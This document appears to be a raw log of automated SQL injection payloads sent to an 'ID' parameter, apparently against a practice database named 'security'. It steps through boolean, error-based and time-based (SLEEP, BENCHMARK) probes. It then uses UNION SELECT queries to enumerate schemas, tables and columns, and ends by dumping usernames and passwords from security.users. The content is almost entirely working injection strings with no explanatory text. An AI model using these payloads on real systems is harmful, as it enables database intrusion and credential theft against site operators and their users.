ID:1
ID:1\
ID:1
ID:1
ID:1
ID:1
ID:6551
ID:1,()"(,.('(
ID:1'EObtmO<'">fPvHki
ID:1) AND 6732=5419 AND (7535=7535
ID:1) AND 2477=2477 AND (6509=6509
ID:1 AND 3147=9734
ID:1 AND 2477=2477
ID:1 AND 9038=3655-- QtbC
ID:1 AND 2477=2477-- mrYS
ID:1') AND 6266=6868 AND ('bMcD'='bMcD
ID:1') AND 2477=2477 AND ('QdSL'='QdSL
ID:1' AND 3033=6823 AND 'gjqw'='gjqw
ID:1' AND 2477=2477 AND 'WHJR'='WHJR
ID:(SELECT (CASE WHEN (5107=8215) THEN 1 ELSE (SELECT 8215 UNION SELECT 1158) END))
ID:(SELECT (CASE WHEN (5707=5707) THEN 1 ELSE (SELECT 2977 UNION SELECT 3228) END))
ID:(SELECT CONCAT(CONCAT(0x71766a7a71,(CASE WHEN (6972=6972) THEN 0x31 ELSE 0x30 END)),0x717a706271))
ID:1) AND 8493=6996#
ID:1) AND 2049=2049#
ID:1)) AND 3715=1656#
ID:1)) AND 2049=2049#
ID:1))) AND 4587=8057#
ID:1))) AND 2049=2049#
ID:1 AND 9801=3896#
ID:1 AND 2049=2049#
ID:1)) AS cqcx WHERE 3502=3502 AND 2692=6312#
ID:1)) AS HNJh WHERE 6859=6859 AND 2049=2049#
ID:1) AS uQqX WHERE 4824=4824 AND 3560=4590#
ID:1) AS irKA WHERE 4281=4281 AND 2049=2049#
ID:1` WHERE 2448=2448 AND 1983=2690#
ID:1` WHERE 2130=2130 AND 2049=2049#
ID:1`) WHERE 5677=5677 AND 3257=8734#
ID:1`) WHERE 6164=6164 AND 2049=2049#
ID:1') AND 5967=3807#
ID:1') AND 2049=2049#
ID:1' AND 5845=1888#
ID:1' AND 2049=2049#
ID:1" AND 9784=5208#
ID:1" AND 2049=2049#
ID:1')) AND 7437=1958#
ID:1')) AND 2049=2049#
ID:1'))) AND 6313=6533#
ID:1'))) AND 2049=2049#
ID:1%' AND 1442=6227#
ID:1%' AND 2049=2049#
ID:1") AND 3002=9733#
ID:1") AND 2049=2049#
ID:1") AND 6116=5357#
ID:1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7a71,(SELECT (ELT(9457=9457,1))),0x717a706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("ZViG"="ZViG
ID:1") OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7a71,(SELECT (ELT(8685=8685,1))),0x717a706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("GwtW"="GwtW
ID:1") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7a71,(SELECT (ELT(2954=2954,1))),0x717a706271,0x78))x)) AND ("uKsW"="uKsW
ID:1") OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7a71,(SELECT (ELT(5325=5325,1))),0x717a706271,0x78))x)) AND ("zues"="zues
ID:1") AND GTID_SUBSET(CONCAT(0x71766a7a71,(SELECT (ELT(6048=6048,1))),0x717a706271),6048) AND ("EnDr"="EnDr
ID:1") OR GTID_SUBSET(CONCAT(0x71766a7a71,(SELECT (ELT(4660=4660,1))),0x717a706271),4660) AND ("ujlk"="ujlk
ID:1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7a71,(SELECT (ELT(8620=8620,1))),0x717a706271)) USING utf8))) AND ("fGdD"="fGdD
ID:1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7a71,(SELECT (ELT(4536=4536,1))),0x717a706271)) USING utf8))) AND ("IaTp"="IaTp
ID:1") AND (SELECT 5831 FROM(SELECT COUNT(*),CONCAT(0x71766a7a71,(SELECT (ELT(5831=5831,1))),0x717a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("HsaT"="HsaT
ID:(SELECT CONCAT(0x71766a7a71,(ELT(6159=6159,1)),0x717a706271))
ID:1");SELECT SLEEP(5)#
ID:1");SELECT SLEEP(5) AND ("fQVC"="fQVC
ID:1");(SELECT * FROM (SELECT(SLEEP(5)))EHai)#
ID:1");(SELECT * FROM (SELECT(SLEEP(5)))nkjI) AND ("LDEm"="LDEm
ID:1");SELECT BENCHMARK(5000000,MD5(0x69414d54))#
ID:1");SELECT BENCHMARK(5000000,MD5(0x41505761)) AND ("mMQj"="mMQj
ID:1") AND (SELECT 5183 FROM (SELECT(SLEEP(5)))JbRQ) AND ("avVD"="avVD
ID:1") AND (SELECT 5183 FROM (SELECT(SLEEP(0)))JbRQ) AND ("avVD"="avVD
ID:1") AND (SELECT 5183 FROM (SELECT(SLEEP(5)))JbRQ) AND ("avVD"="avVD
ID:1") ORDER BY 1#
ID:1") ORDER BY 5527#
ID:1") ORDER BY 10#
ID:1") ORDER BY 6#
ID:1") ORDER BY 4#
ID:1") ORDER BY 3#
ID:1") UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7a71,0x4f62645a754b444e7949576f4d536543765850504a504a584b426f786d6149536b73574d7265674b,0x717a706271)#
ID:1") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,0x426d696177535a71566d6665446c776b4d546b704f7247776a4d4e53626d65756f75704354574a41,0x717a706271),NULL#
ID:1") UNION ALL SELECT CONCAT(0x71766a7a71,0x584152674777514d4c666d7856744849735a434359545165487a4941477441666746455165697953,0x717a706271),NULL,NULL#
ID:1") UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7a71,0x645a6a526d4a634b6844,0x717a706271)#
ID:1") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,0x50415677417446545451,0x717a706271),NULL#
ID:1") UNION ALL SELECT CONCAT(0x71766a7a71,0x416e7166457655456371,0x717a706271),NULL,NULL#
ID:-3306") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,0x55505043597168794354734e6b644f416a68616547444b5a626350526348656a6444626952755567,0x717a706271),NULL#
ID:-9273") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,(CASE WHEN (7186=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7186) THEN 1 ELSE 0 END),0x717a706271),NULL#
ID:-1237") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a706271),NULL#
ID:1
ID:-6387") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,JSON_ARRAYAGG(CONCAT_WS(0x646d746a6561,schema_name)),0x717a706271),NULL FROM INFORMATION_SCHEMA.SCHEMATA#
ID:-2882") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x717a706271),NULL FROM INFORMATION_SCHEMA.SCHEMATA#
ID:-8748") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),NULL#
ID:-8425") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),NULL#
ID:-5921") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),NULL#
ID:-9272") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),NULL#
ID:-6112") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL#
ID:-3411") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),NULL#
ID:-7460") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),NULL#
ID:-1377") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),NULL#
ID:-4420") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(schema_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 8,1),NULL#
ID:1
ID:-3776") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,IFNULL(CAST(DATABASE() AS NCHAR),0x20),0x717a706271),NULL#
ID:1
ID:-7825") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,JSON_ARRAYAGG(CONCAT_WS(0x646d746a6561,table_name)),0x717a706271),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)#
ID:-5443") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20),0x717a706271),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)#
ID:-3354") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 0,1),NULL#
ID:-6217") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 1,1),NULL#
ID:-2580") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 2,1),NULL#
ID:-9205") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(table_name AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1),NULL#
ID:1
ID:-6804") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,JSON_ARRAYAGG(CONCAT_WS(0x646d746a6561,column_name,column_type)),0x717a706271),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479#
ID:-7528") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x717a706271),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479#
ID:-1855") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(column_name AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(column_type AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1),NULL#
ID:-9226") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(column_name AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(column_type AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1),NULL#
ID:-1973") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(column_name AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(column_type AS NCHAR),0x20),0x717a706271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 2,1),NULL#
ID:1
ID:-6561") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,JSON_ARRAYAGG(CONCAT_WS(0x646d746a6561,id,password,username)),0x717a706271),NULL FROM security.users#
ID:-1567") UNION ALL SELECT NULL,CONCAT(0x71766a7a71,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x717a706271),NULL FROM security.users#
ID:-8708") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 0,1),NULL#
ID:-2126") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 1,1),NULL#
ID:-4195") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 2,1),NULL#
ID:-9972") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 3,1),NULL#
ID:-9202") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 4,1),NULL#
ID:-6446") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 5,1),NULL#
ID:-6865") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 6,1),NULL#
ID:-5905") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 7,1),NULL#
ID:-2031") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 8,1),NULL#
ID:-9541") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 9,1),NULL#
ID:-7602") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 10,1),NULL#
ID:-4041") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 11,1),NULL#
ID:-2706") UNION ALL SELECT NULL,(SELECT CONCAT(0x71766a7a71,IFNULL(CAST(id AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(password AS NCHAR),0x20),0x646d746a6561,IFNULL(CAST(username AS NCHAR),0x20),0x717a706271) FROM security.users LIMIT 12,1),NULL#
